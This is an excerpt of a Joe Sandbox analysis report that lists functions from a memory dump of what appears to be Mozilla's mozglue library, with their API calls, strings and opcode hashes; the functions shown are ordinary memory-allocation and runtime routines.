Instruction ID: 08fa2da5de14ba76223e689c1432a0da4e80ddd1b354ecd020877e9e2c025a77
Opcode Fuzzy Hash: a3c78e7a0c4b1b37242d1c006560e891df1f3268808147cad3daf989c851b670
Instruction Fuzzy Hash: EEE0BF70609F42ABDF005FE5D8097467AB8E75679DF208519E905F2740EB70F0848F65

Function 6C9BBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C9BBE49), ref: 6C9BBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C9BBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C9BBE49), ref: 6C9BBF38
RtlReAllocateHeap.NTDLL ref: 6C9BBF83
RtlFreeHeap.NTDLL ref: 6C9BBFA6

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: fac1ea168fb539be759c728daa2a1a4bc70a7676fafcdf65d9227617447c575e
Instruction ID: d2fb92434c0f73e8a4868eef144d7f2d3d94a70513ed11d55859f9e572d3dbfc
Opcode Fuzzy Hash: fac1ea168fb539be759c728daa2a1a4bc70a7676fafcdf65d9227617447c575e
Instruction Fuzzy Hash: CA51AC71A002029FE710DF69CCC0BABB7B6FF98314F284629D515A7B94D730F9168B81

Function 6C9A8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C99B58D,?,?,?,?,?,?,?,6C9CD734,?,?,?,6C9CD734), ref: 6C9A8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C99B58D,?,?,?,?,?,?,?,6C9CD734,?,?,?,6C9CD734), ref: 6C9A8EBF
free.MOZGLUE(?,?,?,?,6C99B58D,?,?,?,?,?,?,?,6C9CD734,?,?,?), ref: 6C9A8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C99B58D,?,?,?,?,?,?,?,6C9CD734,?,?,?,6C9CD734), ref: 6C9A8F46
free.MOZGLUE(?,?,?,?,6C99B58D,?,?,?,?,?,?,?,6C9CD734,?,?,?), ref: 6C9A8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C99B58D,?,?,?,?,?,?,?,6C9CD734,?,?,?), ref: 6C9A8F8F

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: e8af636b1f715f565ab26f8f3cd5aca5fcbabb8113d16e624d1802aa8c90361c
Instruction ID: e012b4b48f6f09e852f1ae7b25b2bc6b4bff92b210284a541196042c4a149aac
Opcode Fuzzy Hash: e8af636b1f715f565ab26f8f3cd5aca5fcbabb8113d16e624d1802aa8c90361c
Instruction Fuzzy Hash: D351C2B1A012568FEB18CF94D88076EB7B6FF48308F25052AD916AB740E731F916CBD5

Function 6C9660E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C965FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9660F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C965FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C966180
free.MOZGLUE(?,?,?,?,6C965FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C966211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C965FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C966229
free.MOZGLUE(?,?,?,?,6C965FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C96625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C965FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C966271

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 832bf1bbfc584e310abbd1fb11c1dee486a33933e62c530667f339d1a8a11485
Instruction ID: 277197432b3d2e20d07a38f459979d41e6299bfee315dc1d55d38f0b1b2d5919
Opcode Fuzzy Hash: 832bf1bbfc584e310abbd1fb11c1dee486a33933e62c530667f339d1a8a11485
Instruction Fuzzy Hash: 48518AB1A042068FFB14CFA9D8807AEB7B5EF45308F210539C616E7B91E731EA58CB51

Function 6C9A27E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C9A2620,?,?,?,6C9960AA,6C995FCB,6C9979A3), ref: 6C9A284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9A2620,?,?,?,6C9960AA,6C995FCB,6C9979A3), ref: 6C9A289A
free.MOZGLUE(?,?,?,6C9A2620,?,?,?,6C9960AA,6C995FCB,6C9979A3), ref: 6C9A28F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9A2620,?,?,?,6C9960AA,6C995FCB,6C9979A3), ref: 6C9A2910
free.MOZGLUE(00000001,?,?,6C9A2620,?,?,?,6C9960AA,6C995FCB,6C9979A3), ref: 6C9A293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C9A2620,?,?,?,6C9960AA,6C995FCB,6C9979A3), ref: 6C9A294E

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 8dc565d372aa64bcd6f66d2e12182e9c5d3c42fea9bb05fb19ae70bb24775fb6
Instruction ID: 3b03178faf194123a2c98558c508a7d653ffab896ad1c099d497d1e6d20be9f3
Opcode Fuzzy Hash: 8dc565d372aa64bcd6f66d2e12182e9c5d3c42fea9bb05fb19ae70bb24775fb6
Instruction Fuzzy Hash: 494115B1A04A068FEB14CFA9D98436A73F5EF85708F240539D95AEB740E731E905CB51

Function 6C95CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE784), ref: 6C95CFF6
LeaveCriticalSection.KERNEL32(6C9DE784), ref: 6C95D026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C95D06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C95D139

Strings

MOZ_CRASH(), xrefs: 6C95D187

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: e85a125eca344988a789748d39649748eb56f54624cf086519c45077b0b5a3a6
Instruction ID: 778ac0424efc2c184f9cf4d152fd8beb73a8cb29c4d2ddf13372aeb212a43488
Opcode Fuzzy Hash: e85a125eca344988a789748d39649748eb56f54624cf086519c45077b0b5a3a6
Instruction Fuzzy Hash: 6A41D132B05A168FDB48CE7C8D9036AB6B4EB49B14F650139E918F7784D7A1AD808BD1

Function 6C954DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C954E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C954E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C954EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C954F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C954F1E

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: bb14178c740c82bfc4c468047a3b685c75b069f3137399ea0622dc03361bfba7
Instruction ID: b1df8f9db74fa726fa3717e1108051fe95a492a82b2905c21d5392e83629f895
Opcode Fuzzy Hash: bb14178c740c82bfc4c468047a3b685c75b069f3137399ea0622dc03361bfba7
Instruction Fuzzy Hash: 7641DE716087019FC745CF29C88095BBBE8BF99344F508A2DF86697B41DB31E978CB92

Function 6C961530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C96152B,?,?,?,?,6C961248,?), ref: 6C96159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C96152B,?,?,?,?,6C961248,?), ref: 6C9615BC
moz_xmalloc.MOZGLUE(-00000001,?,6C96152B,?,?,?,?,6C961248,?), ref: 6C9615E7
free.MOZGLUE(?,?,?,?,?,?,6C96152B,?,?,?,?,6C961248,?), ref: 6C961606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C96152B,?,?,?,?,6C961248,?), ref: 6C961637

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 31e365f89d59d7e06a2cb2fd489cb08d7e5c9c7207f9e57073af560ffe06ab28
Instruction ID: 4bae577ba2892f03bb6f1278af77a25595c102d96fd1185dc0671bae05ec1676
Opcode Fuzzy Hash: 31e365f89d59d7e06a2cb2fd489cb08d7e5c9c7207f9e57073af560ffe06ab28
Instruction Fuzzy Hash: 0231E872A001159BEB188E7DD85147EB7A9FB923647280B2DE423DBFD4EB30D9148792

Function 6C9BAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C9CE330,?,6C97C059), ref: 6C9BAD9D

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C9CE330,?,6C97C059), ref: 6C9BADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C9CE330,?,6C97C059), ref: 6C9BAE01
GetLastError.KERNEL32(?,00000000,?,?,6C9CE330,?,6C97C059), ref: 6C9BAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C9CE330,?,6C97C059), ref: 6C9BAE3D

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: c41c7545e6ad78a29c8c240b861578057259ab3b6d5a151d29e0d6efaccf09a8
Instruction ID: 5fe8a1f7c2f34ded7ed99f90654e1aab18f07058040ac8ae15c4fa3918aafc08
Opcode Fuzzy Hash: c41c7545e6ad78a29c8c240b861578057259ab3b6d5a151d29e0d6efaccf09a8
Instruction Fuzzy Hash: 5F3178B1A003159FDB10DF798C44AABBBF8EF54614F15442DE84AE7700EB34E804C7A1

Function 6C9B5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C9CDCA0,?,?,?,6C98E8B5,00000000), ref: 6C9B5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C98E8B5,00000000), ref: 6C9B5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C98E8B5,00000000), ref: 6C9B5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C98E8B5,00000000), ref: 6C9B5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C98E8B5,00000000), ref: 6C9B5FD6

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: fcbc820f70b3d1a8ecb501618f2d77282b7f1c3dec8537d95c2cebb0234e5409
Instruction ID: 36213f6c55c68a64e303c5cca6067d25d09c6f77d203819cb7b0d3ea1bc6053c
Opcode Fuzzy Hash: fcbc820f70b3d1a8ecb501618f2d77282b7f1c3dec8537d95c2cebb0234e5409
Instruction Fuzzy Hash: C6311834304A009FD711CF29C898F2AB7FAFF89319B648558E5569BB95CB31EC51CB80

Function 6C95B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C95B532
moz_xmalloc.MOZGLUE(?), ref: 6C95B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C95B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C95B57E
free.MOZGLUE(00000000), ref: 6C95B58F

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: ff028db9acb863e20a2d735a66a1351bfdc2a4d5dd39a3cbbe7ca98f870984e9
Instruction ID: c0755dc0d183aa198474801ff678510929a968518e5b9a5eb8147a49fd1ad7e1
Opcode Fuzzy Hash: ff028db9acb863e20a2d735a66a1351bfdc2a4d5dd39a3cbbe7ca98f870984e9
Instruction Fuzzy Hash: CD210771A042059BDB00CF68CC40BAEBBB9FF56304F684129E818DB345E735D962C7A1

Function 6C95B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C95B7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C95B808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C95B82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C95B840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C95B849

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: b29def7535a6821acf77f380aa1737859e9b3ee3411f9f72636b0ab7170f68c2
Instruction ID: de1d3826493bb016507ba8d912d73f47dc5a9a88fed1e611f49e3c45aea7d5b2
Opcode Fuzzy Hash: b29def7535a6821acf77f380aa1737859e9b3ee3411f9f72636b0ab7170f68c2
Instruction Fuzzy Hash: 2D215AB0E002099FDF04DFA9D8855BEBBB8EF59314F148169ED06B7740E731A994CBA1

Function 6C9B6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C9B6E78

Part of subcall function 6C9B6A10: InitializeCriticalSection.KERNEL32(6C9DF618), ref: 6C9B6A68
Part of subcall function 6C9B6A10: GetCurrentProcess.KERNEL32 ref: 6C9B6A7D
Part of subcall function 6C9B6A10: GetCurrentProcess.KERNEL32 ref: 6C9B6AA1
Part of subcall function 6C9B6A10: EnterCriticalSection.KERNEL32(6C9DF618), ref: 6C9B6AAE
Part of subcall function 6C9B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C9B6AE1
Part of subcall function 6C9B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C9B6B15
Part of subcall function 6C9B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C9B6B65
Part of subcall function 6C9B6A10: LeaveCriticalSection.KERNEL32(6C9DF618,?,?), ref: 6C9B6B83

MozFormatCodeAddress.MOZGLUE ref: 6C9B6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C9B6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C9B6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C9B6EFF

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 99dc678e53562e8d79dc6ec59860ab1c62aebc59d92903a349eaaeecc0eefe5d
Instruction ID: 462b598efc7c78d826c711d62852a99d19e631cb13f0d92ce9c7d8a9f0b78ed3
Opcode Fuzzy Hash: 99dc678e53562e8d79dc6ec59860ab1c62aebc59d92903a349eaaeecc0eefe5d
Instruction Fuzzy Hash: CE21A471A042199FDF04DF69D88569F77F9EF88308F044439E909A7241DB70AA58CF92

Function 6C9B76C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C9B76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C9B7705

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C9B7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C9B778F,00000000,00000000,00000000,00000000), ref: 6C9B7731
free.MOZGLUE(00000000), ref: 6C9B7760

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: a010a5dff262a2ec6c4ba7e4218f7b97598254833af0beea5fbb7265af5c81c6
Instruction ID: 5c84674e65c9da30f06616976f04f23dacb155ec28ed4ae7cf1dd680d1664a06
Opcode Fuzzy Hash: a010a5dff262a2ec6c4ba7e4218f7b97598254833af0beea5fbb7265af5c81c6
Instruction Fuzzy Hash: E61190B19052156BE710AF6A8C44AABBEE8EF55754F144529F848A7200E770985087F2

Function 6C990D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C953DEF), ref: 6C990D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C953DEF), ref: 6C990D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C953DEF), ref: 6C990DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C990D97, 6C990DBE
<jemalloc>, xrefs: 6C990D92, 6C990DB9

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 5f53c06ca7513f696dc887395e69eb746b29cdef277021764393462c7597fde3
Instruction ID: 2b1f68d59da961b7faabf52478f1b7f1a97d975c75ec0d4da8d7c678271cad7b
Opcode Fuzzy Hash: 5f53c06ca7513f696dc887395e69eb746b29cdef277021764393462c7597fde3
Instruction Fuzzy Hash: F4F02E31384B9423E720226B0C0AF5A266EA7C7F25F399035F764FE9C0DA50F4404AA6

Function 6C9A7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C9A75C4,?), ref: 6C9A762B

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C9A74D7,6C9B15FC,?,?,?), ref: 6C9A7644
GetCurrentThreadId.KERNEL32 ref: 6C9A765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C9A74D7,6C9B15FC,?,?,?), ref: 6C9A7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C9A74D7,6C9B15FC,?,?,?), ref: 6C9A7677

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 76ab2ef8ce3988ff52b44eae467c489ed848e8d3c4475d0dd79d491e7a832516
Instruction ID: 9bcb35e8034d11b8f8f303c57543403b77d41cd5fe5212095cc725854529d9e4
